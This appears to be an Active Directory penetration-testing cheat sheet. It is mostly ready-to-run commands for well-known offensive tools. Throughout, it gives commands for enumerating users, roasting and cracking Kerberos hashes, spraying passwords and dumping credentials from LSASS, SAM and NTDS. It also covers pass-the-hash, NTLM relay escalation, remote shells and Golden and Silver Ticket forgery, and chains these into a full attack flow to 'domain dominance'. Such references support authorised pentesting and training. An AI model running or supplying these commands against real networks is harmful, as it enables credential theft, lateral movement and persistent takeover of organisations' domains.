PHASE 1: Enumeration (Pre-Auth)
🔹 1. CrackMapExec (CME)
Use it for: Scanning AD networks, checking creds, listing shares, Kerberoastable users, sessions, etc.
Syntax:
# Basic host discovery & SMB check
cme smb 10.10.10.0/24
# Check if creds work
cme smb 10.10.10.5 -u admin -p 'Pass123!'
# List shares
cme smb 10.10.10.5 -u user -p pass --shares
# Kerberoastable users
cme smb 10.10.10.5 -u user -p pass --kerberoast
🔹 2. Kerbrute
Use it for: AS-REP roasting (pre-auth user discovery) and user enumeration.
Syntax:
# User enumeration (no creds needed)
kerbrute userenum --dc 10.10.10.5 -d domain.local users.txt
# AS-REP Roasting (users without pre-auth)
kerbrute asrep --dc 10.10.10.5 -d domain.local users.txt
🔹 3. Impacket GetNPUsers.py
Use it for: Dumping AS-REP roastable hashes.
Syntax:
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.5 -no-pass
🔹 4. BloodHoundPython
Use it for: Headless BloodHound collection without running a GUI.
Syntax:
bloodhound-python -u user -p pass -dc-ip 10.10.10.5 -d domain.local -c All
🔹 5. ldapsearch / impacket-ldapdomaindump
Use it for: Pulling user data, groups, and more over LDAP.
Syntax (ldapsearch):
ldapsearch -x -H ldap://10.10.10.5 -D "user@domain.local" -w 'pass' -b "DC=domain,DC=local"
Syntax (Impacket):
ldapdomaindump ldap://10.10.10.5 -u 'user' -p 'pass'
PHASE 2: Exploitation – Credential Attacks
🔹 6. Hashcat / John the Ripper
Use it for: Cracking hashes (AS-REP, Kerberos, NTLM).
Example (AS-REP Roasting – mode 18200):
hashcat -m 18200 hash.txt rockyou.txt --force
🔹 7. Impacket GetUserSPNs.py
Use it for: Kerberoasting – dumping service account TGS tickets.
Syntax:
GetUserSPNs.py domain.local/user:'pass' -dc-ip 10.10.10.5 -outputfile roast.txt
🔹 8. Mimikatz
Use it for: Dumping credentials, forging tickets, pass-the-hash, etc.
Quick syntax:
# Dump creds from LSASS
privilege::debug
log mimikatz.log
sekurlsa::logonpasswords
# Pass-the-Hash
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<hash> /run:cmd.exe
# Silver Ticket
kerberos::golden /user:<svc> /domain:<domain> /sid:<domain SID> /rc4:<NTLM> /target:<SPN> /service:<SPN type> /ticket:<path>
# Inject ticket
kerberos::ptt ticket.kirbi
🔹 9. Rubeus
Use it for: Kerberoasting, AS-REP roasting, ticket harvesting, ticket forging.
Syntax:
# Kerberoast
Rubeus.exe kerberoast /user:svcaccount /format:hashcat
# AS-REP roast
Rubeus.exe asreproast
# Import ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Dump existing tickets
Rubeus.exe klist
PHASE 3: Post-Auth Enumeration & Escalation
🔹 10. PowerView
Use it for: Enumerating users, groups, ACLs, sessions, SPNs, GPOs.
Syntax (PowerShell):
# Import script
Import-Module .\PowerView.ps1
# Enumerate domain users
Get-DomainUser
# Check local admin access
Invoke-CheckLocalAdminAccess
# Find unconstrained delegation
Get-DomainComputer -Unconstrained
🔹 11. SharpHound (BloodHound)
Use it for: Gathering data for visual AD attack paths.
Syntax:
# In PowerShell
.\SharpHound.exe -c all -d domain.local -u user -p pass
# Upload JSON to BloodHound GUI
🔹 12. SecretsDump.py
Use it for: Dumping NTLM hashes via SMB/RPC if you have SYSTEM access or relay.
Syntax:
secretsdump.py -hashes :<hash> domain.local/user@10.10.10.5
PHASE 4: Ticket Forgery & Persistence
🔹 13. Golden Ticket (Mimikatz)
Forge a domain-wide TGT using krbtgt hash.
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /id:500 /ticket:golden.kirbi
kerberos::ptt golden.kirbi
🔹 14. Silver Ticket (Mimikatz or Rubeus)
Target a single SPN, avoid domain controller traffic.
kerberos::golden /user:srvaccount /domain:domain.local /sid:S-1-5-21-... /rc4:<NTLM hash> /service:cifs /target:target.domain.local /ticket:silver.kirbi
kerberos::ptt silver.kirbi
Bonus: Relaying + Pivoting Tools
🔹 15. ntlmrelayx.py
Use it for: Relaying SMB/HTTP auth to dump secrets or add users.
Syntax:
ntlmrelayx.py -t ldap://10.10.10.5 --escalate-user attacker
🔹 16. Evil-WinRM
Use it for: Shell access if you have valid creds + WinRM is enabled.
Syntax:
evil-winrm -i 10.10.10.5 -u user -p pass
🔹 17. SMBExec / WMIExec / PSExec
Use it for: Remote command execution with creds or hashes.
Syntax (from Impacket):
# psexec
psexec.py domain.local/user@10.10.10.5
# smbexec
smbexec.py domain.local/user@10.10.10.5
# wmiexec
wmiexec.py domain.local/user@10.10.10.5
🔹 18. BloodHound GUI
Use it for: Visualizing privilege escalation and lateral movement paths.
- Use SharpHound or BloodHound-python to collect data.
- Import into GUI and analyze shortest paths (e.g., “Shortest Path to Domain Admin”).
CrackMapExec (CME) — Swiss Army Knife of AD Pentesting
CrackMapExec is one of the most powerful and versatile post-exploitation tools in the AD pentester’s toolkit. It’s used for enumeration, credential validation, exploitation, command execution, dumping hashes, spraying passwords, Kerberoasting, and more — all through SMB, WinRM, LDAP, MSSQL, and other protocols.
Common Protocol Modules in CME
smb— Most commonly used for everything from spraying to dumping hashes.winrm— Used for executing commands over WinRM if enabled.ldap— Used for querying AD via LDAP.mssql— Used for enumerating or exploiting SQL Server instances.
Key CME Use Cases and Syntax
🔹 1. Enumerate Hosts and SMB Info
cme smb 10.10.10.0/24
🔹 2. Credential Validation (Local or Domain)
cme smb 10.10.10.5 -u user -p pass
cme smb 10.10.10.5 -u user -H <NTLM hash>
🔹 3. Password Spraying
cme smb 10.10.10.0/24 -u usernames.txt -p 'Summer2024' --no-bruteforce
🔹 4. Enumerate Shares
cme smb 10.10.10.5 -u user -p pass --shares
🔹 5. Enumerate Sessions
cme smb 10.10.10.5 -u user -p pass --sessions
🔹 6. Dump SAM, LSA, NTDS.dit (with local admin or SYSTEM access)
# Dump SAM database (local accounts)
cme smb 10.10.10.5 -u user -p pass --sam
# Dump LSA secrets
cme smb 10.10.10.5 -u user -p pass --lsa
# Dump NTDS hashes (domain creds)
cme smb 10.10.10.5 -u user -p pass --ntds
🔹 7. Command Execution
# Run commands via SMB
cme smb 10.10.10.5 -u user -p pass -x 'whoami'
🔹 8. Check Local Admin Access Across Network
cme smb 10.10.10.0/24 -u user -p pass --local-auth
🔹 9. Kerberoasting
cme smb 10.10.10.5 -u user -p pass --kerberoast
🔹 10. PTH (Pass-the-Hash)
cme smb 10.10.10.5 -u user -H <NTLM hash> --shares
🔹 11. Custom Modules
CME supports modular extensions. You can write your own or use community-built ones. Check available modules:
cme smb -L
To run a specific module:
cme smb 10.10.10.5 -u user -p pass -M <module> -o <options>
Examples:
# Run 'wdigest' module to check for plaintext creds
cme smb 10.10.10.5 -u user -p pass -M wdigest
# Run 'adcs' module to check for misconfigured ADCS
cme smb 10.10.10.5 -u user -p pass -M adcs
Real-World AD Pentest Flow (Toolchain in Action)
Here’s how these tools come together in a real-world pentest scenario from initial access to domain dominance.
Scenario: You’ve got a foothold on a Windows machine in a domain.
1. Enumerate the Network
# Identify hosts and services
nmap -p 445,88,135,139,389,5985 10.10.10.0/24
# Use CrackMapExec to fingerprint hosts
cme smb 10.10.10.0/24
2. Find Valid Users (No Creds Yet)
# Try Kerbrute userenum
kerbrute userenum --dc 10.10.10.5 -d domain.local users.txt
3. Attempt AS-REP Roasting
# Use GetNPUsers to pull AS-REP hashes
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.5 -no-pass
4. Crack the Hash
hashcat -m 18200 hash.txt rockyou.txt --force
5. Use Valid Creds with CME
# Check which machines the user has access to
cme smb 10.10.10.0/24 -u user -p pass
# Dump shares, look for juicy loot
cme smb <ip> -u user -p pass --shares
6. Perform Kerberoasting
GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.10.5 -outputfile roast.txt
7. Crack SPN Hash
hashcat -m 13100 roast.txt rockyou.txt --force
8. Find Privileged Access
# BloodHoundPython collection
bloodhound-python -u user -p pass -dc-ip 10.10.10.5 -d domain.local -c All
# Load into BloodHound GUI and find "Shortest Path to Domain Admin"
9. Lateral Movement
# Use valid hash or password with Evil-WinRM
evil-winrm -i <ip> -u user -p pass
# Or use CME with PTH
cme smb <ip> -u user -H <NTLM> -x 'whoami'
10. Dump Domain Hashes
# If you’ve got SYSTEM access
secretsdump.py domain.local/user@target -hashes :<NTLM> -dc-ip 10.10.10.5
11. Forge Tickets (Persistence)
# Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ticket:golden.kirbi
# Silver Ticket
kerberos::golden /user:svc /rc4:<hash> /service:cifs /target:host.domain.local /ticket:silver.kirbi
